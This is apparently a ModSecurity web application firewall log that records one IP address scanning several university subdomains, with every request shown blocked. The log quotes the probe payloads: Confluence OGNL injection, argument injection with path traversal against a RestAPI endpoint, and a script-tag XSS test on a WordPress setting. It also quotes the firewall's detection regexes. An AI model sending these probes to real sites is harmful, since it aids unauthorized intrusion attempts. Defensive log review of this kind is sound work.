"/wp-admin/admin-ajax.php"] [unique_id "ZO10ssCo-f0AAAPDn8cAAAAP"]
[Tue Aug 29 11:31:46.358184 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAN@5I4AAAAO"]
[Tue Aug 29 11:31:46.367026 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAPDn8gAAAAP"]
[Tue Aug 29 11:31:46.370294 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQMrvoAAAAu"]
[Tue Aug 29 11:31:46.374786 2023] [:error] [pid 1045] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQV4PcAAAA3"]
[Tue Aug 29 11:31:46.389065 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10ssCo-f0AAAQEGNQAAAAm"]
[Tue Aug 29 11:31:47.378930 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPMmKsAAAAY"]
[Tue Aug 29 11:31:47.407139 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAP5mKsAAAAM"]
[Tue Aug 29 11:31:47.424567 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAN@5JIAAAAO"]
[Tue Aug 29 11:31:47.425134 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQR47UAAAAz"]
[Tue Aug 29 11:31:47.425558 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPDn8wAAAAP"]
[Tue Aug 29 11:31:47.429919 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAQQymQAAAAy"]
[Tue Aug 29 11:31:47.439582 2023] [:error] [pid 1060] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQkBYYAAAAC"]
[Tue Aug 29 11:31:47.445656 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAQSWOoAAAA0"]
[Tue Aug 29 11:31:47.446780 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/pages/createpage-entervariables.action"] [unique_id "ZO10s8Co-f0AAAP@M20AAAAZ"]
[Tue Aug 29 11:31:47.448800 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:KEY_LENGTH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  \\x22..\\x5c found within ARGS:KEY_LENGTH: 1024 -providerclass Si -providerpath \\x22..\\x5cbin\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/RestAPI/Connection"] [unique_id "ZO10s8Co-f0AAAPDn80AAAAP"]
[Tue Aug 29 11:31:49.300351 2023] [:error] [pid 854] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAANWgVsAAAAG"]
[Tue Aug 29 11:31:49.302238 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPDn9EAAAAP"]
[Tue Aug 29 11:31:49.311606 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQR47wAAAAz"]
[Tue Aug 29 11:31:49.313244 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPMmLEAAAAY"]
[Tue Aug 29 11:31:49.317713 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQMrwIAAAAu"]
[Tue Aug 29 11:31:49.380385 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAPiBlkAAAAB"]
[Tue Aug 29 11:31:49.402904 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAQQymoAAAAy"]
[Tue Aug 29 11:31:49.406754 2023] [:error] [pid 1020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tcCo-f0AAAP8G1sAAAAV"]
[Tue Aug 29 11:31:49.412081 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tcCo-f0AAAP5mLIAAAAM"]
[Tue Aug 29 11:31:50.308928 2023] [:error] [pid 1017] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP5mLMAAAAM"]
[Tue Aug 29 11:31:50.309565 2023] [:error] [pid 1018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAP6NP4AAAAQ"]
[Tue Aug 29 11:31:50.318085 2023] [:error] [pid 994] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAPiBloAAAAB"]
[Tue Aug 29 11:31:50.319018 2023] [:error] [pid 1063] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:queryString. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data:  #{16*8787}  found within ARGS:queryString: aaaa\\x5cu0027 #{16*8787} \\x5cu0027bbb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/confluence/pages/createpage-entervariables.action"] [unique_id "ZO10tsCo-f0AAAQnF4sAAAAF"]
[Tue Aug 29 11:31:50.319682 2023] [:error] [pid 1041] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sgcgoogleanalytic. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:sgcgoogleanalytic: <script>console.log(\\x22document.domain\\x22)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO10tsCo-f0AAAQR474AAAAz"]
